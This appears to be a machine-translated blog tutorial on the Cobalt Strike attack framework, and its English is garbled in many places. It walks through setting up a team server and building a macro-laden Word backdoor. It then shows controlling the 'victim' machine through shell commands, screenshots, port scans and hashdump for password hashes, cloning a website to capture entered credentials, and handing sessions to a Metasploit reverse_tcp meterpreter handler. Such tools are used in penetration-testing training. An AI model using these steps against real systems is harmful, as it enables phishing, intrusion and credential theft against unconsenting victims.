Cobal Strike To learn and use

Cobalt Strike It's based on java Penetration testing artifact , It's often called CS( Full text abbreviation CS) god device .3.0 After revision, it will be used as an independent platform . It is divided into client and server , The server is a , Customer There can be multiple terminals , It can be operated by the team , Share attack resources with target information and sessions, Can be simulated APT Do simulation confrontation , To infiltrate the intranet .

——

Cobalt Strike Integrated port forwarding 、 Scan multimode ports Listener、Windows exe Program generation 、
Windows dll Dynamic link library generation 、java Program generation 、office Macro code generation 、 Horse binding 、 Phishing attack
And so on .

Download it okay cs The folder is in Linux Take a portion. ,Windows Take a portion. .

——
——

Linux Server settings

The team server is best run on Linux, Server key files teamserver and cobaltstrike.jar
perform teamsever.sh file ,IP So Linux Of IP,123456 For the connection password of the later client .
The given connection port can be seen in the echo information .

./teamserver.sh 192.168.1.1 123456

Client creates a new connection , Fill in IP, And the set password , Port given , The user name is arbitrary .
Want to connect , The server must be open as above .

——
——

Windows Client side Settings

New listener

To configure

The set monitor can be seen underground .

———
——

Try to generate a backdoor file

attack - Create a back door -ms office
Here we try to generate word File the back door

Click to select the listener just created

Then pop up this , Click on copy Copy code .

And then create a new one word file .
Click new macro , just copy Copy the contents of .
Save as suffix enable macro .

After clicking Create , Put just copy Paste all the code in . And save it .

Then save the file as , And select macro enabled word Templates .

——
——

The victim goes online

When the target opens this file , You can see the successful launch .

Right click the victim machine to enter beacon conversation

perform cmd The command needs to use “shell”+ Executed command , Other commands can use help
Such as ipconfig, command shell ipconfig

Screenshot of victim

screenshot

After successful execution, you can see the screenshot

Port scanning

Choose a goal –> Port scanning
or portscan [ip] command

It will automatically identify the intranet where the target machine is located ip paragraph , Can choose ARP,ICMP,none There are three ways to enter
Line scan ,ports Fill in the port you want to scan

scanning

——

Read user password

hashdump

need administrator jurisdiction

——
——

The victim can shut down the process and stop listening .

tasklist Look at the process
taskkill /F -pid 19280

——
——

Clone website test

Set up clone website , port , The host address defaults to the server IP, Click clone .

——
Set up the success

——
visit

——
Then check it out web journal , You can see the content entered in the website above .

——
——

Cobalt Strike And And msf The linkage of

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
2. stay Cobalt Strik In the implementation of , First add a listening command , The name is :msf payload choice ：
windows/foreign/reverse_tcp Listening port ：4444

Select the victim host , Then right-click Spawn

stay msf Click to pop up meterpreter conversation .